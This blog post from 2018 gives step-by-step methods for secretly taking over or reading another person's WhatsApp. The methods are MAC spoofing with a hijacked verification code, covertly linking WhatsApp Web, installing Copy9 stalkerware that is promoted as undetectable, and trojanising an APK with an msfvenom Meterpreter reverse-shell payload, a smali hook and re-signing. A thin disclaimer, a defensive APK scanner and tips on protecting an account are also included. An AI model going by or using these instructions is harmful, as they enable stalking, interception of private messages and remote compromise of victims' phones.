TECHNOLOGY: WhatsApp Can Be Hacked

Wednesday, 4 April 2018


I will show you several methods by which WhatsApp can be hacked. Okay, now let's see.
Disclaimer: The following content is intended to inform users about vulnerabilities in WhatsApp; I am in no way encouraging users to break into someone’s privacy.
It is relatively easy for a person to snoop into someone’s WhatsApp if they have access to the victim’s phone.
Method 1 : By changing the MAC Address
Note : Device must be rooted for this method
Step 1 : First of all, completely uninstall WhatsApp from your phone.
Step 2 : Obtain someone else’s phone which you want to access.
Step 3 : And find the MAC address of that phone. It’ll be in six pairs like- 01:43:65:87:98:cb
For Android, go to Settings – About phone – Status – WI-Fi MAC address.
For iPhone, go to Settings – General – About – WI-Fi Address.
For Windows phone, find this in Settings – About – More info – MAC address.
For BlackBerry, go to Options – Device – Device and Status info – WLAN MAC.
Step 4 : Now find your MAC address also and save both MAC addresses at any safe place.
Step 5 : Another step is install MAC spoofing apps for changing the MAC address of your phone. For iPhones install MacDaddy X or WifiSpoof. And for Android you can install some free apps like BusyBox and Terminal Emulator, which are available on google play store.
Step 6 : Now open app, in the terminal, type “ ip link show” to see a list of interfaces. Identify the one that has your MAC address — for this example, we’ll use the eth0 interface. In the terminal emulator, enter “ IP link set eth0 address XX:XX:XX:XX:XX:XX ” and “ ip link set eth0 broadcast XX:XX:XX:XX:XX:XX “, where eth0 is the interface you identified and XX:XX:XX:XX:XX:XX is your target’s MAC address. To check that you’ve successfully changed your MAC address, enter “ iplink show eth0 .”
Step 7 : Install WhatsApp on your phone but do not enter your phone number, enter your target’s phone number to set up WhatsApp rather than your own. Now catch the target’s phone second and last time for receiving whatsapp verification code, after getting that code, delete that message from the target’s mobile phone. Now all tasks have been done ENJOY!!
Step 8 : When you no longer need to access your target’s WhatsApp account, change your MAC address back to what it was. By following the same method as above.
Method 2 : Scanning the QR code
Note : This method doesn't require root, but pay attention: when you follow the method below, the victim's phone shows the logged-in device.

This method is simple and efficient way to keep an eye on one's Whatsapp conversations. You should have a PC/Laptop/android device and get an access to their phone for a minute!
Step 1 : In your pc/laptop open browser type in Url as http://web.whatsapp.com
For Android device you can download whatsweb App from playstore click here for download https://play.google.com/store/apps/details?id=com.whatsweb.app
Step 2 : Now Open WhatsApp on victim phone and go to WhatsApp Web from menu and scan the QR code shown in your PC/Laptop/android chrome browser
Thats it! Now whenever he/she is around you can simply open the Whatsapp web and check his messages.
Method 3 : Installing third-party app in victim mobile Copy9
Perhaps all of this spends complicated, but the real procedure is more than just simple. In essence, you will have to:
Step 1: download The Copy9 App
Step 2: Install it on targeted device
Step 3: Login to your control panel on a PC. Done
As you can see, the entire process takes no more than 5 minutes of your time.
It is specifically developed to be simple enough for average users and those who don’t even fully understand smartphones and how they work.
The bottom line is yes, you will be able to use it without a problem.
Here it should be mentioned that there is no risk of being detected!
The app works by connecting to the operating system and literally becoming part of it.
As such, the app has all the access to the OS on your phone, obviously.
The app cannot be detected by antivirus, malware software or on any other way.
Hard reset of a device won’t delete the app as well. At the end, we can add Copy9 is the safest app to use.
The hack Whatsapp online feature
Besides the hack Whatsapp online feature, Copy9 offers plenty of additional features!
- Besides the fact you will be able to read Whatsapp messages, the app allows you to read messages and monitor calls performed via other apps. All messenger apps are supported.
- Tracking the GPS location is possible as well. The app will determine the exact location of a smartphone within a matter of seconds.
- Monitoring internet activities is just another feature. Although Whatsapp tracker option is associated with the internet, the feature here is a bit different.
- Basically, it allows for the user to block access to the web, limit it or check out what has been visited via the targeted device.
The full list of features is significantly long. In general, you will be able to hack Whatsapp chat history, monitor call, all messages, internet activity, GPS, detecting when a SIM card is changed and many other features.
Customer support is guaranteed and also more than just decent, which isn’t a case with apps of this kind!
The best part, you get a free trial, without a need to enter your credit card. If you don’t like it, after 48 hours simply delete the app and you are done.
However, most users who tried the free trial, have been using Copy9 ever since.

Method 4 : WhatsApp Tracker Mxspy app allows Hackers to Intercept and Read Your Encrypted Messages
Method 5 : Need kali linux operating system
Here are the basic steps
1.Generate the Meterpreter payload
2.Decompile the payload and the original apk
3.Copy the payload files to the original apk
4.Inject the hook into the appropriate activity of the original apk
5.Inject the permissions in the AndroidManifest.xml file
6.compile the original apk
7.Sign the apk using Jarsigner

First of all, we have to make the Meterpreter payload. We are going to use MSFVenom for this. The command is-
msfvenom -p android/meterpreter/Payload_Type LHOST=IP_Address LPORT=Incoming_Port -o meterpreter.apk
Replace Payload_Type by any of the following payloads available. The function of all these payloads are same, essentially they are all Meterpreter payloads, the difference is only in the method they use to connect to your Kali system. The available Payload_Types are –
You can use any one you like, I'm going to use reverse_https as an example.
Replace IP_Address by the IP address to which the payload is going to connect back to, i.e the IP address of the attacker's system. If you are going to perform this attack over a local network (eg. if the victim and attacker are connected to the same WiFi hotspot), your Local IP will suffice. To know what your local IP is, run the command –
If you are going to perform this attack over the Internet, you have to use your public IP address, and configure your router properly (set up port forwarding) so that your system is accessible from the Internet. To know your public IP, just google "My IP" and Google will help you out.
Replace Incoming_Port with the port no. which you want to be used by the payload to connect to your system. This can be any valid port except the reserved ones like port 80 (HTTP). I'm going to use 4895 as an example.
So run the command using replacing the keywords with appropriate values and MSFVenom will generate a payload "meterpreter.apk" in the root directory. Note that we specified the output file name using the "-o meterpreter.apk" argument in the command, so if you like, you can name it anything else also.

Step 2 : DECOMPILE the APKs:
Now we have to decompile the APKs, for this we are going to use APKTool. It decompiles the code to a fairly human-readable format and saves it in .smali files, and also successfully extracts the .xml files. Assuming you have already installed the latest apktool and also have the original apk file in the root directory, run the following commands –
apktool d -f -o payload /root/meterpreter.apk
apktool d -f -o original /root/Original_APK_Name
It will decompile the payload to "/root/payload" and the original apk to "/root/original" directory.

Now we have to copy the payload files to the original app's folder. Just go to "/root/payload/smali/com/metasploit/stage" and copy all the .smali files whose file name contains the word 'payload'. Now paste them in "/root/original/smali/com/metasploit/stage". Note that this folder does not exists, so you have to create it.

In the previous step, we just copied the payload codes inside the original apk, so that when the original apk is recompiled, it will contain the payload. But that doesn't necessarily mean that the payload will run. To ensure that the payload runs, we have to inject a hook in the original apk's .smali code. If you are wondering what is this hook thingy I'm talking about, well essentially it's a code which intercepts some specific function call and reacts to it. In this case, we are going to place the hook so that when the app is launched, it will also launch the payload with it.
For this, firstly we have to find out which activity to put it simply, activities are sections of code, it's similar to frames in windows programming is run when the app is launched. We can get this info from the AndroidManifest.xml file.
So open up the AndroidManifest.xml file located inside the "/root/original" folder using any text editor. If you know HTML, then this file will look familiar to you. Both of them are essentially Markup Languages, and both use the familiar tags and attributes structure e.g. Content . Anyway, look for an tag which contains both the lines –
On a side note, you can use CTRL+F to search within the document in any GUI text editor. When you locate that activity, note its "android:name" attribute's value. In my case, as you can see from the screenshot below, it is "com.piriform.ccleaner.ui.activity.MainActivity".
Those two lines we searched for signifies that this is the activity which is going to start when we launch the app from the launcher icon, and also this is a MAIN activity similar to the 'main' function in traditional programming.
Now that we have the name of the activity we want to inject the hook into, let's get to it! First of all, open the .smali code of that activity using gedit. Just open a terminal and type –
gedit /root/original/smali/Activity_Path
Replace the Activity_Path with the activity's "android:name", but instead of the dots, type slash. Actually the smali codes are stored in folders named in the format the "android:name" is in, so we can easily get the location of the .smali code in the way we did. Check the screenshot below and you will get an idea of what I'm trying to say.
Now search for the following line in the smali code using CTRL+F –
When you locate it, paste the following code in the line next to it –
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
What we are doing here is, inserting a code which starts the payload alongside the existing code which is executed when the activity starts. Now, save the edited smali file.

From Android Developers –
Additional finer-grained security features are provided through a "permission" mechanism that enforces restrictions on the specific operations that a particular process can perform.
If we do not mention all the additional permissions that our payload is going to need, it cannot function properly. While installing an app, these permissions are shown to the user. But most of the users don't care to read all those boring texts, so we do not have to worry about that much.
These permissions are also listed in the previously encountered AndroidManifest file. So let's open the AndroidManifest.xml of both the original app and the payload from the respective folders. The permissions are mentioned inside tag as an attribute 'android:name'. Copy the additional permission lines from the Payload's AndroidManifest to the original app's one. But be careful that there should not be any duplicate.
Here's my original app's AndroidManifest before editing –
After adding the additional ones from the Payload's AndroidManifest, my /root/original/AndroidManifest.xml looks like this –

Now the hard parts are all done! We just have to recompile the backdoored app into an installable apk. Run the following command –
apktool b /root/original
You will now have the compiled apk inside the "/root/original/dist" directory. But, we're still not done yet.

Step 7 : SIGN the APK:
This is also a very important step, as in most of the cases, an unsigned apk cannot be installed. From Android Developers –
Android requires that all apps be digitally signed with a certificate before they can be installed. Android uses this certificate to identify the author of an app, and the certificate does not need to be signed by a certificate authority. Android apps often use self-signed certificates. The app developer holds the certificate's private key.
In this case we are going to sign the apk using the default android debug key. Just run the following command –
jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA apk_path androiddebugkey
Be sure to replace the apk_path in the above command with the path to your backdoored apk file.
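A defender-side check for the repackaging described in Method 5, added here as an example and not part of the original post: it scans an apktool-decoded tree for the `com/metasploit/stage` classes and the injected `Payload;->start` call, and lists permissions that are absent from a trusted copy of the app's manifest. The sample tree, the `com.example.app` package and all function names are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the page: payload package path and the injected hook call.
PAYLOAD_DIR = "com/metasploit/stage"
HOOK = "Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"
PERM_RE = re.compile(r'<uses-permission[^>]*android:name="([^"]+)"')

def permissions(manifest_text):
    return set(PERM_RE.findall(manifest_text))

def triage(decoded_dir, baseline_manifest):
    """Compare an apktool-decoded tree with the trusted build's manifest text."""
    root = Path(decoded_dir)
    found = {"payload_files": [], "hooked_files": []}
    for smali in sorted(root.rglob("*.smali")):  # smali/, smali_classes2/, ...
        rel = smali.relative_to(root).as_posix()
        if PAYLOAD_DIR in rel:
            found["payload_files"].append(rel)
        elif HOOK in smali.read_text(errors="replace"):
            found["hooked_files"].append(rel)
    current = permissions((root / "AndroidManifest.xml").read_text(errors="replace"))
    found["added_permissions"] = sorted(current - permissions(baseline_manifest))
    return found

def manifest(*names):  # constructed minimal manifest used only by the sample
    tag = '<uses-permission android:name="android.permission.{}"/>'
    return "<manifest>" + "".join(tag.format(n) for n in names) + "</manifest>"
BASELINE = manifest("INTERNET")  # stands in for the publisher's manifest
def build_sample(root):
    """Write a constructed tree (not a real app) shaped like apktool output."""
    files = {
        "AndroidManifest.xml": manifest("INTERNET", "READ_SMS", "RECORD_AUDIO"),
        "smali/com/example/app/MainActivity.smali":
            ".method protected onCreate(Landroid/os/Bundle;)V\n"
            f"    invoke-static {{p0}}, {HOOK}\n.end method\n",
        "smali/com/metasploit/stage/Payload.smali":
            ".class public Lcom/metasploit/stage/Payload;\n",
    }
    for rel, text in files.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(text)

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        return triage(tmp, BASELINE)
```

Renamed packages defeat the two string matches, so treat the permission diff and a signing certificate that differs from the publisher's release as the more durable signals.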
How to protect your WhatsApp account:
- Don’t hand over your phone to a person you don't trust.
- Keep your message inbox secure with a separate lock, so that no second person can read your messages from the text inbox.
- If someone is using WhatsApp Web with your number, go to the settings of your WhatsApp and click “log-out from all browser”, or some similar option will be there.
- Enable two-step verification as follows: open WhatsApp > Settings > Account > Two-step verification > Enable.
- This step will ask you to create a password and will prevent someone else from using your number for WhatsApp verification.